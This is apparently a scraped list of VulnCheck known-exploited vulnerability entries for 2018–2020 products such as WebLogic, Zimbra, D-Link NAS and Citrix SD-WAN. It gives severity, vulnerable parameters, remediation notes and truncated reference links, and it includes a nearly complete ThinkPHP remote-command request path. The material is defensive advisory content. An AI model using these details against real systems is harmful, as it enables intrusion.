WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.
Affected: WSO2 api_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2020-17453; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-17453; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-202
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-7796 [CRITICAL] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery vulnerability if WebEx zimlet installed and zimlet JSP is enabled.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-12&host_type=src&vulnerability=cve-2020-7796; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-13&host_type=src&vulnerability=cve-2020-7796; https://dashboard.shadowserver.org/statisti
VulnCheck
Liferay Portal Deserialization of Untrusted Data Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-7961 [CRITICAL] CWE-502 Liferay Portal Deserialization of Untrusted Data Vulnerability
Liferay Portal Deserialization of Untrusted Data Vulnerability
Liferay Portal contains a deserialization of untrusted data vulnerability that allows remote attackers to execute code via JSON web services.
Affected: Liferay Liferay Portal
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.imperva.com/blog/python-cryptominer-botnet-quickly-adopts-latest-vulnerabilities/; https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/; https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html; https://www.trendmicro.com/en_us/research/21/g/threat-actors-
VulnCheck
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
vulncheck·2020·CVSS 7.5
CVE-2020-3452 [HIGH] CWE-20 Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an improper input validation vulnerability when HTTP requests process URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/
VulnCheck
Unraid Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5847 [CRITICAL] Unraid Remote Code Execution Vulnerability
Unraid Remote Code Execution Vulnerability
Unraid contains a vulnerability due to the insecure use of the extract PHP function that can be abused to execute remote code as root. This CVE is chainable with CVE-2020-5849 for initial access.
Affected: Unraid Unraid
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-01&host_type=src&vulnerability=cve-2020-5847; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-5847; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&
VulnCheck
74cms 74cms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-22211 [CRITICAL] 74cms 74cms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
74cms 74cms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
Affected: 74cms 74cms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5902 [CRITICAL] CWE-22 F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability
F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability
F5 BIG-IP Traffic Management User Interface (TMUI) contains a remote code execution vulnerability in undisclosed pages.
Affected: F5 BIG-IP
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://redcanary.com/blog/kinsing-malware-citrix-saltstack/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-206a; https://www.crowdstrike.com/blog/who-is-pioneer-kitten/; https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-259a; https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a; https://www.esentire.com/se
VulnCheck
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
vulncheck·2020·CVSS 8.8
CVE-2020-0618 [HIGH] CWE-502 Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services contains a deserialization vulnerability when handling page requests incorrectly. An authenticated attacker can exploit this vulnerability to execute code in the context of the Report Server service account.
Affected: Microsoft SQL Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-targetcompany; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://redalert.nshc.net/2024/07/26/the-activities-s
VulnCheck
Atlassian subversion_application_lifecycle_management Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-9344 [MEDIUM] Atlassian subversion_application_lifecycle_management Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Atlassian subversion_application_lifecycle_management Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
Affected: Atlassian subversion_application_lifecycle_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 8.8
CVE-2020-17505 [HIGH] articatech web_proxy Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
articatech web_proxy Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-17505; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2020-17505;
VulnCheck
TerraMaster tos Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-28188 [CRITICAL] TerraMaster tos Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
TerraMaster tos Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
Affected: TerraMaster tos
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/; https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; https://unit42.paloaltone
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-17506 [CRITICAL] articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-01&host_type=src&vulnerability=cve-2020-17506; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-17506; https://dashboard.s
VulnCheck
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
vulncheck·2020·CVSS 8.8
CVE-2020-24949 [HIGH] PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
Affected: php-fusion php-fusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-24949; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scan
VulnCheck
D-Link DNS-320 Device Command Injection Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-25506 [CRITICAL] CWE-78 D-Link DNS-320 Device Command Injection Vulnerability
D-Link DNS-320 Device Command Injection Vulnerability
D-Link DNS-320 device contains a command injection vulnerability in the sytem_mgr.cgi component that may allow for remote code execution.
Affected: D-Link DNS-320 Storage Device
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/; https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities; https://blog.netlab.360.com/new-ddos-botnet-wszeor/; https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-
VulnCheck
craftcms Craft CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-9757 [CRITICAL] craftcms Craft CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
craftcms Craft CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
Affected: craftcms Craft CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Oracle WebLogic Server Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-14882 [CRITICAL] Oracle WebLogic Server Remote Code Execution Vulnerability
Oracle WebLogic Server Remote Code Execution Vulnerability
Oracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-14882; https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bo
VulnCheck
Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-15505 [CRITICAL] CWE-706 Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
Ivanti MobileIron's Core & Connector, Sentry, and Monitor and Reporting Database (RDB) products contain an unspecified vulnerability that allows for remote code execution.
Affected: Ivanti MobileIron Multiple Products
Required Action: Apply updates per vendor instructions.
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF; https://us-cert.cisa.gov/ncas/alerts/aa20-275a; https://cisa.gov/news-events/cybersecurity-advisories/aa20-283a; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnera
VulnCheck
icewarp mail_server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-27982 [MEDIUM] icewarp mail_server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
icewarp mail_server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
IceWarp 11.4.5.0 allows XSS via the language parameter.
Affected: icewarp mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
BI Publisher Component of Oracle Fusion Middleware Unauthorized Update, Insert or Delete Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-2767 [HIGH] BI Publisher Component of Oracle Fusion Middleware Unauthorized Update, Insert or Delete Vulnerability
BI Publisher Component of Oracle Fusion Middleware Unauthorized Update, Insert or Delete Vulnerability
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). While the vulnerability is in BI Publisher (formerly XML Publisher), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of BI Publisher (formerly XML Publisher) accessible data as well as unauthorized read access to a su
VulnCheck
Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-18935 [CRITICAL] CWE-502 Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability
Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability
Progress Telerik UI for ASP.NET AJAX contains a deserialization of untrusted data vulnerability through RadAsyncUpload which leads to code execution on the server in the context of the w3wp.exe process.
Affected: Progress Telerik UI for ASP.NET AJAX
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://redcanary.com/blog/blue-mockingbird-cryptominer/; https://lifars.com/knowledge-center/xmrig-based-coinminer-bluemockingbird-group/; https://www.telerik.com/blogs/blue-mockingbird-vulnerability-telerik-guidance; https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html; https://www.hhs.gov/sites/default/files/netw
VulnCheck
wavemaker wavemarker_studio Server-Side Request Forgery (SSRF)
vulncheck·2019·CVSS 9.6
CVE-2019-8982 [CRITICAL] wavemaker wavemarker_studio Server-Side Request Forgery (SSRF)
wavemaker wavemarker_studio Server-Side Request Forgery (SSRF)
com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
Affected: wavemaker wavemarker_studio
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
D-Link DNS-320 Remote Code Execution Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16057 [CRITICAL] CWE-78 D-Link DNS-320 Remote Code Execution Vulnerability
D-Link DNS-320 Remote Code Execution Vulnerability
The login_mgr.cgi script in D-Link DNS-320 is vulnerable to remote code execution.
Affected: D-Link DNS-320 Storage Device
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.securityweek.com/flaw-gives-hackers-remote-access-files-stored-d-link-dns-320-devices; https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.ivanti.com/resources/v/doc/pr-survey-report/ransomware-quarterly-indexreport_q2-q3; ht
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
vulncheck·2019·CVSS 9.8
CVE-2019-9670 [CRITICAL] CWE-611 Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
Synacor Zimbra Collaboration Suite (ZCS) contains an improper restriction of XML external entity (XXE) vulnerability in the mailboxd component.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF; https://www.tenable.com/blog/daisy-chaining-how-vulnerabilities-can-be-greater-than-the-sum-of-their-parts; https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF; https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf; htt
VulnCheck
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12988 [CRITICAL] Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 4 of 6).
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-10-31&host_type=src&vulnerability=cve-2019-12988; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/
VulnCheck
ThinkPHP Remote Code Execution Vulnerability
vulncheck·2019·CVSS 8.8
CVE-2019-9082 [HIGH] CWE-306 ThinkPHP Remote Code Execution Vulnerability
ThinkPHP Remote Code Execution Vulnerability
ThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
Affected: ThinkPHP ThinkPHP
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://go.catonetworks.com/rs/245-RJK-441/images/Security%20Quarterly%20Report.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://decoded.avast.io/martinchlumecky/dirty
VulnCheck
Four-Faith f3x24_firmware Missing Authorization
vulncheck·2019·CVSS 7.2
CVE-2019-12168 [HIGH] Four-Faith f3x24_firmware Missing Authorization
Four-Faith f3x24_firmware Missing Authorization
Four-Faith Wireless Mobile Router F3x24 v1.0 devices allow remote code execution via the Command Shell (aka Administration > Commands) screen.
Affected: Four-Faith f3x24_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://info.greynoise.io/hubfs/resources/GreyNoise-How-Resurgent-Vulnerabilities-Jeopardize-Organizational-Security-Report.pdf; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2019-12168&date
VulnCheck
Oracle WebLogic Server, Injection
vulncheck·2019·CVSS 9.8
CVE-2019-2725 [CRITICAL] CWE-74 Oracle WebLogic Server, Injection
Oracle WebLogic Server, Injection
Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html; https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/; https://blog.talosintelligence.com/2019/05/threat-source-may-9-19.html; https://unit42.paloalt
VulnCheck
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-1653 [HIGH] CWE-284 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers contain improper access controls for URLs. Exploitation could allow an attacker to download the router configuration or detailed diagnostic information.
Affected: Cisco RV Series Routers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.mandiant.com/resources/blog/apt41-initiates-global-intrusion-campaign-using-multiple-exploits; https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer; https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attacking-100-plus-companies/; https://cisa.gov/news-events/cybersec
VulnCheck
Oracle Fusion Middleware BI Publisher Unauthenticated Security Bypass
vulncheck·2019·CVSS 4.9
CVE-2019-2588 [MEDIUM] Oracle Fusion Middleware BI Publisher Unauthenticated Security Bypass
Oracle Fusion Middleware BI Publisher Unauthenticated Security Bypass
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher (formerly XML Publisher) accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
Affected: Oracle BI Publisher
Required Action: Apply remediations or mitigation
VulnCheck
zeroshell zeroshell Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12725 [CRITICAL] zeroshell zeroshell Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
zeroshell zeroshell Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
Affected: zeroshell zeroshell
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html; https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr; https://hei
VulnCheck
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-12987 [CRITICAL] Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN and NetScaler Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 3 of 6).
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-05&host_type=src&vulnerability=cve-2019-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2019-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability
VulnCheck
microstrategy microstrategy_web Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2018·CVSS 6.1
CVE-2018-18775 [MEDIUM] microstrategy microstrategy_web Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
microstrategy microstrategy_web Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter. NOTE: this is a deprecated product.
Affected: microstrategy microstrategy_web
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning
VulnCheck
dedecms dedecms Cross-Site Request Forgery (CSRF)
vulncheck·2018·CVSS 8.8
CVE-2018-7700 [HIGH] dedecms dedecms Cross-Site Request Forgery (CSRF)
dedecms dedecms Cross-Site Request Forgery (CSRF)
DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
Affected: dedecms dedecms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-7700; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-17&host_type=src&vulnerability=cve-2018-7700; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-19&
VulnCheck
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-16763 [CRITICAL] thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
Affected: thedaylightstudio Fuel CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-16763; https://dashboard.sh
VulnCheck
jsmol2wp_project jsmol2wp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2018·CVSS 7.5
